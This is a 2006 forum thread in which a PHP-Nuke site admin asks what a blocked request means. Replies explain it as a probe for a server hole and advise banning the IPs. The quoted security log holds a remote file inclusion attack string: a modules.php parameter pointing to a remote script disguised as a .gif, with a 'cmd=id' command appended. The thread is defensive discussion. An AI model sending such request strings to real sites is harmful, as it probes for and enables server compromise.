What does this code do?

registered · Worker Joined: Oct 07, 2003 Posts: 211

I keep getting a filter block on from a certain web page. Can anyone give me an idea of what the code on the page does?

Here's the sentinel info:

Quote:

User Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)

Query String: bootleghollow.com/modules.php?name=http://sca.postech.ac.kr/zboard/skin/buzzard_p4/img/btn_lists.gif?
&cmd=id

Get String: bootleghollow.com/modules.php?name=http://sca.postech.ac.kr/zboard/skin/buzzard_p4/img/btn_lists.gif?
&cmd=id

Post String: bootleghollow.com/modules.php

Here's the code that shows up on the following link (Obviously not an image file): It is html code.

http://sca.postech.ac.kr/zboard/skin/buzzard_p4/img/btn_lists.gif

I didn't post the code because I thought it might kick in sentinel and get me banned.

Is this anything to worry about? Sentinel has been banning whoever tries to use the script. Just keeps adding different IP addresses to the htaccess files.

Posted: Sun Feb 12, 2006 3:09 pm

Subject to validation by some of the experts here, what usually happens in Nuke is that when you move around from module to module or even within a module, everything goes thru modules.php and where it goes next is determined by what follows the name= string that you listed above. Usually it is the "name" of another module within your site, say "news" or "weblinks" or "private_message" or the like. So if they formulate a string like the one you listed they are probably trying to execute a command on a different server where they can stick some kind of hack. They try to disquise that by putting the hack in a file with a gif extension but as you noted it's really html.

I believe Sentinel detects this as cross site scripting and bans it, as you noticed.

registered · Posted: Sun Feb 12, 2006 10:40 pm

Yep, it is a code that is used to see if your server can be hacked. Ban the IPs, report the URL to the host of that site